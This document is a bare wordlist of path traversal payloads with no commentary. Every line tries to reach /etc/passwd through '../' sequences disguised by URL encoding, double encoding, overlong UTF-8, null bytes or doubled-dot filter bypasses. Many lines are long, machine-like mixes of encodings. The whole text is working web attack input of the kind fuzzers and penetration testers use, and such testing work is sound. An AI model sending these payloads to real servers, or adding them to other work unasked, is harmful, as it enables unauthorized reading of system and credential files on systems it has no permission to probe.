../../../../etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afetc%c0%afpasswd
....//....//....//etc/passwd
%00../../../../etc/passwd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
..%252e%252e%252f..%252e%252e%252fetc%252fpasswd
....%2f....%2f....%2fetc%2fpasswd
....%5c....%5c....%5cetc%5cpasswd
%25%25%2e%25%25%2e%25%25%2f%25%25%2e%25%25%2e%25%25%2fetc%25%25%2fpasswd
%25%30%30%25%30%30%2f%25%30%30%25%30%30%2f%25%30%30%2fetc%25%30%30%2fpasswd
%252e%252e%255c%252e%252e%255c%252e%252e%255cetc%255cpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%2e%252e%2e%252e%2f%2e%252e%2e%252e%2f%2e%252e%2e%252e%2fetc%252fpasswd
%2e%252e%2e%252e%5c%2e%252e%2e%252e%5c%2e%252e%2e%252e%5cetc%252fpasswd
%2e%252e%252e%252e%2f%2e%252e%252e%252e%2f%2e%252e%252e%252e%2fetc%2fpasswd
%2e%2e%2e%2e%2e%2f%2e%2e%2e%2e%2e%2f%2e%2e%2e%2e%2e%2fetc%2fpasswd
%2e%2e%2e%2e%2f%2e%2e%2e%2e%2f%2e%2e%2e%2e%2f%2e%2e%2e%2e%2fetc%2fpasswd
%2e%2e%2e%2e%2e%2f%2e%2e%2e%2e%2e%2f%2e%2e%2e%2e%2e%2f%2e%2e%2e%2e%2e%2fetc%2fpasswd
%2e%2e%2e%2e%2e%2e%2f%2e%2e%2e%2e%2e%2e%2f%2e%2e%2e%2e%2e%2e%2f%2e%2e%2e%2e%2e%2e%2fetc%2fpasswd
%2e%2e%2e%2e%2e%2f%2e%2e%2e%2e%2e%2f%2e%2e%2e%2e%2e%2f%2e%2e%2e%2e%2e%2f%2e%2e%2e%2e%2e%2fetc%2fpasswd
%2e%2e%2e%2e%2e%2f%2e%2e%2e%2e%2e%2f%2e%2e%2e%2e%2e%2f%2e%2e%2e%2e%2e%2f%2e%2e%2e%2e%2e%2e%2e%2fetc%2fpasswd
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fetc%252fpasswd
%252e%252e%252e%252e%252f%252e%252e%252e%252e%252f%252e%252e%252e%252e%252f%252e%252e%252e%252e%252fetc%252fpasswd
%2e%2e%252e%2e%252e%2e%252e%2e%252f%2e%2e%252e%2e%252e%2e%252e%2e%252fetc%2e%2e%252fpasswd
%2e%2e%252e%2e%252f%2e%2e%252e%2e%252f%2e%2e%252e%2e%252fetc%2e%2e%252fpasswd
%2e%2e%2e%2e%252f%2e%2e%2e%2e%252f%2e%2e%2e%2e%252f%2e%2e%2e%2e%252fetc%2e%2e%252fpasswd
%252e%2e%252e%2e%252e%2e%252f%252e%2e%252e%2e%252e%2e%252fetc%252fpasswd
%2e%2e%252e%2e%252e%2e%252e%2e%252f%2e%2e%252e%2e%252e%2e%252fetc%252fpasswd
%2e%2e%2e%2e%2e%2e%252f%2e%2e%2e%2e%2e%2e%252f%2e%2e%2e%2e%2e%2e%252f%2e%2e%2e%2e%2e%2e%252fetc%252fpasswd
%2e%2e%2e%2e%2e%2e%2e%2e%252f%2e%2e%2e%2e%2e%2e%2e%2e%252f%2e%2e%2e%2e%2e%2e%2e%2e%252fetc%252fpasswd
%2e%2e%2e%2e%2e%2e%2e%2e%252e%2e%252f%2e%2e%2e%2e%2e%2e%2e%2e%252e%2e%252fetc%252fpasswd
%2e%2e%252e%2e%252e%2e%2e%2e%2e%252f%2e%2e%252e%2e%252e%2e%2e%2e%2e%252fetc%252fpasswd
%2e%2e%252e%2e%252e%2e%2e%2e%2e%252e%2e%252f%2e%2e%252e%2e%252e%2e%2e%2e%2e%252e%2e%252fetc%252fpasswd
%2e%2e%252e%2e%2e%2e%252e%2e%252e%252e%252f%2e%2e%252e%2e%2e%2e%252e%2e%252e%252e%252fetc%252fpasswd
%2e%2e%252e%2e%252e%2e%252e%2e%252e%252e%252e%252f%2e%2e%252e%2e%252e%2e%252e%2e%252e%252e%252e%252fetc%252fpasswd
%2e%2e%2e%2e%252e%2e%2e%2e%252e%2e%252e%2e%252e%2e%252e%2e%252e%252e%252fetc%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%252fpasswd
%2e%2e%2e%2e%252e%252e%2e%2e%2e%252e%2e%252e%252e%2e%252e%2e%2e%252f%2e%2e%2e%252fetc%252e%252fpasswd
%2e%2e%2e%2e%252e%2e%252e%252e%252e%2e%252e%252e%252e%252e%252f%2e%2e%2e%2e%252fetc%252fpasswd
%2e%2e%252e%2e%2e%2e%252e%252e%252e%2e%2e%252e%2e%2e%2e%252f%2e%2e%2e%2e%2e%2e%252fetc%252fpasswd
%252e%2e%252e%2e%2e%2e%2e%252e%252e%252e%252e%252f%2e%252e%2e%2e%252e%252e%252fetc%252fpasswd
%2e%2e%2e%2e%2e%2e%252e%252e%252e%2e%252e%2e%252e%252e%2e%252e%252e%252e%2e%252f%252fetc%252fpasswd
%2e%2e%2e%2e%252e%2e%2e%252e%2e%2e%252e%252e%2e%2e%2e%252f%2e%252f%2e%2e%252e%252f%2e%2e%252e%2e%2e%2e%252e%252e%252fetc%252fpasswd
%2e%2e%2e%252e%2e%252e%2e%252e%2e%2e%2e%252f%252f%2e%2e%252e%2e%252e%252f%2e%2e%252e%2e%2e%252fetc%252fpasswd
%252e%252e%252e%2e%2e%2e%2e%252e%252e%2e%252f%252e%252e%252e%2e%252e%2e%252e%2e%252e%2e%252e%252e%252e%252fetc%252fpasswd
%2e%2e%252e%252e%2e%2e%252e%252e%2e%2e%2e%2e%2e%2e%2e%252f%2e%2e%2e%252e%2e%252fetc%252fpasswd
%2e%252e%2e%252e%252e%252e%252e%252e%252f%252e%2e%2e%2e%252e%252e%2e%252f%2e%252e%252e%2e%252e%2e%2e%252f%2e%252e%2e%2e%2e%2e%2e%2e%2e%252fetc%2e%2e%2e%2e%252fpasswd
%2e%2e%2e%2e%2e%252e%2e%252e%2e%2e%2e%252e%2e%252e%252f%2e%252e%2e%252e%252e%252e%252e%2e%2e%252f%2e%252e%2e%2e%252fetc%252fpasswd
%252e%252e%252e%252e%2e%2e%252e%252e%2e%252e%252e%252f%2e%2e%252e%2e%252e%2e%252f%2e%252e%2e%252e%252e%252e%252e%2e%252e%2e%252f%2e%2e%252e%252e%252e%2e%252e%2e%2e%252e%252fetc%252fpasswd
%252e%252e%252e%2e%2e%2e%2e%2e%2e%2e%252e%252e%2e%2e%252e%252e%2e%252e%252f%252f%252e%252e%252e%2e%2e%252e%2e%252e%2e%2e%2e%252e%2e%2e%252e%252fetc%252fpasswd
%252e%2e%252e%2e%2e%2e%252e%252e%252e%2e%252e%252e%2e%252f%252e%252e%252e%2e%2e%2e%2e%252e%252e%252e%252e%252f%2e%252e%252fetc%252fpasswd
%2e%2e%252e%2e%2e%2e%2e%2e%252e%2e%252e%252e%252e%252e%252e%2e%252e%2e%252e%252e%252f%252e%252e%252e%252e%252e%252e%252e%2e%252e%252e%252e%2e%2e%2e%252e%2e%252e%2e%2e%2e%252e%2e%252e%2e%252e%252e%2e%2e%252e%252e%252fetc%252fpasswd
%2e%2e%252e%252e%2e%252e%2e%2e%252e%2e%252e%2e%252e%2e%252e%252e%252e%252e%2e%2e%252e%2e%252e%252e%252e%2e%2e%2e%252fetc%252fpasswd
%2e%2e%2e%2e%2e%2e%2e%252e%252e%252e%2e%2e%2e%252e%252e%2e%2e%2e%2e%2e%252f%252e%252f%252f%2e%2e%2e%2e%2e%2e%2e%2e%2e%252e%2e%2e%252e%252e%252e%2e%2e%252e%252e%252e%252e%252e%252fetc%252fpasswd
%2e%252e%252e%2e%2e%252e%252e%252e%252e%2e%252e%252f%2e%2e%2e%2e%252e%252f%2e%252e%252e%252e%2e%2e%252e%2e%2e%252e%252e%252e%252e%2e%2e%2e%2e%2e%2e%252e%2e%2e%252e%252fetc%252fpasswd
%252e%2e%252e%252e%252e%252e%252e%252e%252e%252e%2e%2e%252e%252e%252f%2e%2e%252e%252e%2e%2e%252e%252f%252e%2e%2e%252e%2e%2e%2e%2e%2e%252f%2e%252e%252e%2e%252e%252e%2e%2e%252e%2e%252fetc%252fpasswd
%2e%252e%2e%252e%2e%2e%2e%2e%252e%252e%252e%2e%2e%2e%2e%252f%2e%2e%2e%2e%2e%2e%2e%252fetc%252fpasswd
%252e%252e%2e%2e%252e%2e%252e%252e%252e%2e%252e%2e%2e%252e%252e%252e%2e%2e%252e%252e%2e%2e%2e%252e%2e%2e%2e%252e%252e%252e%252e%252e%252e%2e%252e%2e%2e%2e%252f%252e%2e%252f%252e%252fetc%252fpasswd
%252e%252e%2e%2e%2e%252e%252e%252e%252e%2e%252e%2e%252e%252e%252f%2e%2e%252f%2e%2e%252e%252e%252e%2e%252fetc%252fpasswd
%252e%252e%252e%252e%252e%2e%2e%2e%2e%2e%252e%252e%252e%2e%252e%2e%252f%252e%2e%252e%252f%2e%252e%2e%252e%252f%2e%2e%252e%252e%2e%2e%2e%2e%2e%252e%2e%252f%2e%252f%252e%252f%2e%252e%252e%2e%2e%252e%252e%252f%2e%252e%252fetc%252fpasswd
%252e%252e%252e%2e%252e%2e%2e%252e%252f%252e%252e%252e%2e%2e%252e%252e%252e%252f%252e%252e%252f%2e%252e%252f%252f%2e%252e%2e%2e%252f%252f%2e%2e%252e%252e%252e%2e%2e%252e%252e%252e%252e%2e%252e%252e%2e%252e%252e%252fetc%252fpasswd
%252e%2e%252e%252e%2e%252e%252e%252e%2e%2e%2e%252e%2e%2e%252e%252e%252e%252e%252e%252f%252e%252f%252e%2e%2e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%2e%252e%2e%2e%2e%252e%2e%2e%252e%2e%252e%252e%2e%252f%252e%252e%2e%252e%2e%2e%252e%2e%252e%252e%252e%252e%252e%252f%2e%2e%252e%2e%252e%252e%252f%252f%252e%252e%252e%2e%2e%252e%252e%252e%2e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252f%2e%252e%252f%252e%252e%252f%252e%2e%252f%252e%252f%252e%252e%252f%252f%252e%2e%2e%2e%252e%2e%2e%252e%2e%252e%252e%2e%2e%2e%252e%252fetc%252fpasswd
%2e%2e%2e%252e%2e%2e%2e%252e%252e%252e%252e%252f%2e%2e%252e%252f%252e%252e%2e%2e%2e%2e%252e%2e%2e%2e%252e%2e%2e%2e%2e%252fetc%252fpasswd
%252e%2e%2e%2e%252e%2e%2e%2e%252e%252e%252e%252e%252e%2e%2e%252e%2e%252f%2e%2e%252e%252f%252e%252e%2e%2e%2e%252e%2e%252f%252e%2e%2e%252e%2e%2e%252e%252f%252e%252f%252e%252fetc%252fpasswd
%2e%2e%252e%252e%2e%2e%2e%252e%252e%252e%252e%2e%2e%2e%252e%2e%252e%2e%252e%252e%2e%252f%2e%2e%252e%252f%2e%252e%2e%252e%2e%252f%2e%2e%2e%252f%252e%2e%2e%252f%2e%2e%252e%252fetc%252fpasswd
%2e%2e%252e%252e%252e%252e%2e%252e%252e%2e%252e%2e%2e%252e%2e%2e%2e%252e%2e%252e%2e%252f%2e%252e%252e%2e%252e%252f%252e%2e%252fetc%252fpasswd
%252e%2e%252e%2e%252e%2e%2e%252e%252e%252e%2e%2e%2e%2e%2e%252e%2e%2e%252e%2e%252e%252e%252e%2e%252e%252e%252e%252e%252e%252e%252e%252f%2e%252fetc%252fpasswd
%2e%252e%2e%2e%2e%252e%2e%2e%2e%2e%252e%252e%252e%2e%2e%2e%252f%2e%2e%252e%252e%252e%252e%252e%252f%2e%252e%252e%252e%252f%2e%252f%252e%252e%252f%2e%2e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252e%2e%2e%2e%252e%252e%2e%2e%2e%252e%2e%2e%252e%2e%2e%252e%252e%252e%2e%252e%252e%252e%252e%252e%252e%252e%2e%2e%252f%252fetc%252fpasswd
%252e%2e%252e%2e%252e%252e%2e%2e%252e%2e%2e%2e%2e%2e%252e%252e%252e%252e%252e%252e%252e%252f%2e%2e%2e%252e%2e%252f%2e%2e%2e%2e%252fetc%252fpasswd
%2e%2e%252e%2e%252e%252e%252e%252e%252e%2e%2e%2e%252e%2e%252e%2e%252e%252f%2e%2e%252e%252f%2e%2e%252fetc%252fpasswd
%2e%252e%2e%252e%252e%252e%2e%252e%252e%252e%252e%252e%252e%252e%252e%252e%2e%252e%252e%252e%252e%252e%252f%252f%252f%2e%2e%252e%252f%252f%252e%2e%252e%252e%252e%252f%252e%252e%2e%252e%252f%252e%252e%2e%252fetc%252fpasswd
%2e%2e%2e%2e%2e%2e%2e%2e%252e%252e%2e%252e%252e%252e%252e%2e%252e%252f%2e%252e%2e%252f%252e%2e%252fetc%252fpasswd
%2e%2e%2e%2e%2e%252e%252e%252e%2e%252e%252e%252e%252f%252e%252e%2e%2e%252e%252e%252f%252f%2e%2e%2e%2e%252e%2e%252e%252e%252f%2e%252e%252e%252f%252e%252e%252e%252f%252e%252e%252f%252fetc%252fpasswd
%252e%252e%252e%252e%252e%2e%2e%252e%252e%2e%252f%252e%252e%2e%252e%252e%2e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%2e%2e%2e%2e%252e%252e%252e%252e%252f%2e%2e%252f%252e%252e%252f%252f%2e%2e%2e%252e%252f%252e%252e%2e%2e%2e%252e%2e%252f%252e%2e%252e%252e%252e%252e%252f%252e%252e%252f%252e%252e%252f%2e%252f%2e%252f%252e%252f%2e%252f%252f%252e%252fetc%252fpasswd
%2e%252e%252e%252e%252e%2e%2e%2e%252e%252e%2e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%2e%2e%252f%252f%252f%252f%252f%252f%252f%2e%252e%252e%2e%252f%2e%252fetc%252fpasswd
%2e%252e%252e%252e%2e%252e%252e%252e%2e%2e%252f%252e%2e%252f%252e%252e%252e%2e%2e%2e%2e%2e%252f%252e%2e%252f%252e%252e%252e%252f%2e%252e%252f%252e%252e%252f%252e%252e%2e%252fetc%252fpasswd
%252e%2e%252e%2e%252e%252e%252e%2e%252e%252e%2e%252f%252e%2e%2e%252e%252f%252f%2e%252e%252e%2e%2e%2e%252e%252e%2e%252e%2e%252e%2e%252e%252e%2e%2e%2e%2e%2e%252e%252e%252f%252e%2e%252fetc%252fpasswd
%2e%252e%2e%252e%2e%252e%252e%252e%2e%252e%252e%252e%252e%252e%252f%252e%252e%252e%2e%252e%252e%252e%252e%252e%252e%252e%252e%252e%2e%252e%252f%2e%2e%2e%2e%2e%2e%252e%252f%252fetc%252fpasswd
%252e%252e%252e%2e%252e%2e%252e%2e%252e%2e%2e%252e%2e%2e%2e%252e%2e%252e%252e%252e%252f%252e%252e%2e%2e%252e%252e%252e%252f%252e%252e%252f%2e%2e%252fetc%252fpasswd
%252e%252e%252e%2e%252e%2e%252e%252e%2e%252e%252e%252e%2e%252f%2e%2e%252e%252f%2e%2e%252f%252f%252e%2e%2e%252e%252f%2e%2e%252e%2e%252e%2e%252e%252e%252e%252e%2e%252fetc%252fpasswd
%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%252e%2e%2e%252fetc%252fpasswd
%2e%252e%252e%252e%2e%252e%2e%252e%252e%2e%252f%252e%2e%252e%2e%252f%252e%2e%2e%252f%252e%252f%2e%2e%252f%252e%2e%252e%252e%2e%252e%2e%252e%252e%2e%2e%252e%2e%252f%2e%252f%252e%252fetc%252fpasswd
%2e%2e%2e%2e%252e%2e%252e%252e%2e%2e%252e%252e%252f%252e%2e%2e%252e%2e%252f%252e%2e%2e%2e%252e%252e%252f%252e%2e%2e%252f%2e%252e%252e%252f%252fetc%252fpasswd
%252e%252e%2e%252e%252e%2e%2e%252e%252f%2e%2e%252e%2e%252f%2e%2e%252f%252e%252e%252f%252e%252e%252e%2e%252f%2e%252e%252e%252f%252e%2e%252e%252f%252e%252e%252e%252e%252f%252e%2e%252e%252e%2e%252fetc%252fpasswd
%2e%252e%252e%2e%252e%2e%2e%252e%2e%252e%252e%252e%252f%2e%252f%2e%252e%2e%252f%252f%252e%2e%2e%252f%2e%252f%252e%252f%252f%252e%252e%252f%252e%252f%2e%2e%252e%2e%2e%252f%252fetc%252fpasswd
%2e%2e%252e%252e%252e%2e%252e%2e%252f%252e%2e%2e%252e%252e%2e%252e%2e%252f%2e%252e%252f%2e%2e%252e%252f%252f%2e%2e%2e%252e%252f%252e%252f%252e%252f%252f%252f%252e%252f%2e%252fetc%252fpasswd
%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%252e%252e%2e%2e%252e%252e%252e%2e%252e%252e%252e%252e%252e%252e%252e%252f%252f%2e%252f%2e%252f%252e%252fetc%252fpasswd
%2e%2e%252e%2e%2e%2e%2e%2e%252e%2e%2e%252e%252e%2e%252e%252e%252e%252e%252e%2e%252e%252e%252e%252e%252f%252e%252e%252f%2e%2e%252fetc%252fpasswd
%2e%2e%2e%252e%2e%2e%252e%252e%2e%252f%252e%2e%2e%2e%252e%252e%252f%252e%2e%2e%2e%2e%252f%2e%252e%2e%252f%252e%252e%2e%252fetc%252fpasswd
%2e%252e%2e%252e%252e%252e%2e%252e%2e%252e%252e%2e%2e%2e%2e%252e%252e%2e%252e%252e%252e%252e%2e%252e%252e%252e%2e%252e%252e%2e%252f%252e%252e%2e%252e%252e%252e%2e%2e%2e%252e%252e%2e%252fetc%252fpasswd

